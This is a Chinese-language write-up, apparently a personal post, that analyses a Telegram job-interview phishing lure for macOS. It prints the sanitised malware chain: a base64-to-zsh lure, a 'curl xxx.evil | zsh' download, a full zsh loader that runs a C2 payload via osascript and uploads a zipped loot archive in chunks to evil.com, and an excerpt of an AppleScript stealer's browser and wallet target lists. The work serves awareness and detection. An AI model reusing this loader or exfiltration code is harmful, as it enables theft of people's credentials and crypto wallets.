文中代码均已消毒处理
最近在看新的工作机会,遇到一个让加 tg 的,本来觉着没啥,也就在 tg 上沟通
越聊越觉得对面的文字不像是人打出来的,遣词造句的风格,难以言说
终于发来了面试链接,一点开就是个弹窗,要复制命令装驱动,一眼钓鱼

还是按捺不住好奇心,复制下来看看,最基础的 echo | base64 -d | zsh
于是解码看看是啥
echo ‘The sound carder drver certificate is currently beinginstalledand updated. Please wait…’ & curl xxx.evil/xxx | zsh
好嘛,又下载了一个脚本,接着扒

又是一个把 base64 解码出的压缩包解压后再 eval 的脚本,继续解压看看
1#!/bin/zsh
2daemon_function() {
# Second-stage routine of the phishing chain described in the write-up:
# (1) fetch an osascript payload from the C2 and run it, (2) exfiltrate the
# archive that payload leaves at /tmp/osalogging.zip in chunks, (3) delete
# the archive. It runs fully detached (see the exec lines below). The host,
# token and API key on this page are placeholders ("evil.com", "xxxx", "xx")
# left by the author's sanitisation.
3 exec </dev/null
4 exec >/dev/null
5 exec 2>/dev/null
# ^ stdin, stdout and stderr are all redirected to /dev/null: nothing is shown
# to the victim and nothing is read from the terminal from here on.
6 local domain="evil.com"
7 local token="xxxx"
8 local api_key="xx"
9 local file="/tmp/osalogging.zip"
# Stage-3 download: plain HTTP (and -k, so TLS errors would be ignored too)
# piped straight into osascript. If the script was given an argument it is
# forwarded verbatim as pwd= (what the caller passes is not visible here).
# For detection, the fixed User-Agent string, the custom "api-key" header and
# the "/dynamic?txd=" path are the useful network artefacts.
10 if [ $# -gt 0 ]; then
11 curl -k -s --max-time 30 \
12 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
13 -H "api-key: $api_key" \
14 "http://$domain/dynamic?txd=$token&pwd=$1" | osascript
15 else
16 curl -k -s --max-time 30 \
17 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
18 -H "api-key: $api_key" \
19 "http://$domain/dynamic?txd=$token" | osascript
20 fi
# $? here is the status of the pipeline above (osascript's, unless pipefail
# is set); a failed payload run aborts the whole script.
21 if [ $? -ne 0 ]; then
22 exit 1
23 fi
# The osascript payload is expected to have written its loot archive to $file
# (the AppleScript excerpt later on the page does this with ditto). Nothing to
# upload if it is missing or empty.
24 if [[ ! -f "$file" || ! -s "$file" ]]; then
25 return 1
26 fi
# Upload parameters: 10 MiB chunks, up to 8 attempts per chunk, and an upload
# id of "<epoch seconds>-<8 random hex bytes>" ($RANDOM$RANDOM is the fallback
# when openssl is unavailable).
27 local CHUNK_SIZE=$((10 * 1024 * 1024))
28 local MAX_RETRIES=8
29 local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM)
30 local total_size
# File size via BSD stat (-f %z, macOS) first, GNU stat (-c %s) as fallback.
31 total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file")
32 if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then
33 return 1
34 fi
# Ceiling division: number of chunks needed to cover total_size.
35 local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
36 local i=0
37 while (( i < total_chunks )); do
38 local offset=$((i * CHUNK_SIZE))
39 local chunk_size=$CHUNK_SIZE
# The last chunk is shortened to whatever remains of the file.
40 (( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset))
41 local success=0
42 local attempt=1
# Per-chunk retry loop: dd cuts the chunk out of the archive (bs=1, so skip
# and count are byte offsets) and curl PUTs it to the /gate endpoint with
# upload_id / chunk_index / total_chunks in the query string. Only the HTTP
# status code is kept (-o /dev/null -w "%{http_code}").
43 while (( attempt <= MAX_RETRIES && success == 0 )); do
44 http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \
45 curl -k -s -X PUT \
46 --data-binary @- \
47 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
48 -H "api-key: $api_key" \
49 --max-time 180 \
50 -o /dev/null \
51 -w "%{http_code}" \
52 "http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null)
53 curl_status=$?
# A chunk counts as delivered only when curl itself exited 0 and the server
# answered 2xx; otherwise back off (3 + 2*attempt seconds, attempt already
# incremented) and retry.
54 if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then
55 success=1
56 else
57 ((attempt++))
58 sleep $((3 + attempt * 2))
59 fi
60 done
# Give up on the whole upload once a single chunk exhausts its retries.
61 if (( success == 0 )); then
62 return 1
63 fi
64 ((i++))
65 done
# Anti-forensic cleanup: the staged archive is deleted after a successful
# upload, so on an affected host the evidence is more likely to be in proxy /
# DNS logs (PUT requests to /gate) than on disk.
66 rm -f "$file"
67 return 0
68}
# Entry point. The trailing & runs daemon_function in the background, so the
# if tests whether the job was *launched* (backgrounding returns status 0),
# not whether the function succeeded: the script exits 0 right away, the else
# branch is not expected to be reached, and the detached function keeps
# running after the caller is gone.
69if daemon_function "$@" & then
70 exit 0
71else
72 exit 1
73fi
终于是个有点事做的脚本了,做的事情也很简单,下载恶意脚本交给 osascript 执行,再分块上传本地的 /tmp/osalogging.zip 包(这个包正是由 osascript 脚本生成的),最后把它删掉
可能因为我访问链接时用的是 macOS,所以服务端下发的是 osascript 脚本
这下下载到的就是真正做坏事的脚本了,只贴出无害部分
-- Excerpt of the stage-3 AppleScript stealer (the author left out the harmful
-- handlers). This part only builds the target lists and invokes handlers that
-- are defined elsewhere in the full script. `library`, `profile` and
-- `writemind` are set outside this excerpt; judging by the paths joined to
-- them they look like the Application Support folder, the home directory and
-- a staging directory respectively — TODO confirm against the full script.

-- Chromium-family browsers: {display name, data directory} pairs.
set chromiumMap to {}
set chromiumMap to chromiumMap & {{"Yandex", library & "Yandex/YandexBrowser/"}}
set chromiumMap to chromiumMap & {{"Chrome", library & "Google/Chrome/"}}
set chromiumMap to chromiumMap & {{"Brave", library & "BraveSoftware/Brave-Browser/"}}
set chromiumMap to chromiumMap & {{"Edge", library & "Microsoft Edge/"}}
set chromiumMap to chromiumMap & {{"Vivaldi", library & "Vivaldi/"}}
set chromiumMap to chromiumMap & {{"Opera", library & "com.operasoftware.Opera/"}}
set chromiumMap to chromiumMap & {{"OperaGX", library & "com.operasoftware.OperaGX/"}}
set chromiumMap to chromiumMap & {{"Chrome Beta", library & "Google/Chrome Beta/"}}
set chromiumMap to chromiumMap & {{"Chrome Canary", library & "Google/Chrome Canary"}}
set chromiumMap to chromiumMap & {{"Chromium", library & "Chromium/"}}
set chromiumMap to chromiumMap & {{"Chrome Dev", library & "Google/Chrome Dev/"}}
set chromiumMap to chromiumMap & {{"Arc", library & "Arc/User Data"}}
set chromiumMap to chromiumMap & {{"Coccoc", library & "CocCoc/Browser/"}}
-- Gecko-family browsers: {display name, profiles directory} pairs.
set geckoMap to {}
set geckoMap to geckoMap & {{"Firefox", library & "Firefox/Profiles/"}}
set geckoMap to geckoMap & {{"Zen", library & "zen/Profiles/"}}
set geckoMap to geckoMap & {{"LibreWolf", library & "LibreWolf/Profiles/"}}
set geckoMap to geckoMap & {{"Waterfox", library & "Waterfox/Profiles/"}}
-- Desktop cryptocurrency wallets: {path-like label such as
-- "Wallets/Desktop/Exodus", wallet data directory} pairs; some live under
-- `library`, some under dot-folders in `profile`.
set walletMap to {}
set walletMap to walletMap & {{"Wallets/Desktop/Exodus", library & "Exodus/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Electrum", profile & "/.electrum/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Atomic", library & "Atomic Wallet/Local Storage/leveldb/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Guarda", library & "Guarda/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Coinomi", library & "Coinomi/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Sparrow", profile & "/.sparrow/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Wasabi", profile & "/.walletwasabi/client/Wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Bitcoin_Core", library & "Bitcoin/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Armory", library & "Armory/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Electron_Cash", profile & "/.electron-cash/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Monero", profile & "/.bitmonero/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Litecoin_Core", library & "Litecoin/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Dash_Core", library & "DashCore/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Dogecoin_Core", library & "Dogecoin/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Electrum_LTC", profile & "/.electrum-ltc/wallets/"}}
set walletMap to walletMap & {{"Wallets/Desktop/BlueWallet", library & "BlueWallet/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Zengo", library & "Zengo/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Trust", library & "Trust Wallet/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Ledger Live", library & "Ledger Live/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Ledger Wallet", library & "Ledger Wallet/"}}
set walletMap to walletMap & {{"Wallets/Desktop/Trezor Suite", library & "@trezor"}}
-- Collection handlers, not shown on the page. Judging by their names they
-- copy browser data, wallet extensions, Gecko profiles, desktop wallets,
-- Telegram data, keychains, cloud credentials, a process list and selected
-- files into the `writemind` staging directory.
Chromium(writemind, chromiumMap)
ChromiumWallets(writemind, chromiumMap)
Gecko(writemind, geckoMap)
DesktopWallets(writemind, walletMap)
Telegram(writemind, library)
Keychains(writemind)
CloudKeys(writemind & "Profile/")
Processes(writemind)
Filegrabber(writemind)
-- Pack the staging directory into /tmp/osalogging.zip (ditto -c -k = create a
-- PKZip archive). This is the file the zsh dropper on this page then uploads
-- in chunks and deletes. `try` without an `on error` clause silently ignores
-- any failure, so a missing directory does not stop the script.
try
do shell script "ditto -c -k --sequesterRsrc " & writemind & " /tmp/osalogging.zip"
end try
-- Cleanup of /tmp/sync*; what is written there is not visible in this
-- excerpt. Together with /tmp/osalogging.zip this is the host-side artefact
-- a responder can look for.
try
do shell script "rm -rf /tmp/sync*"
end try
坏得很呀,各大浏览器,各个钱包的数据,全部打包到 /tmp/osalogging.zip
配合刚才那个脚本,所有数据打包上传一条龙,不小心执行了网页上复制的命令可就得遭老罪了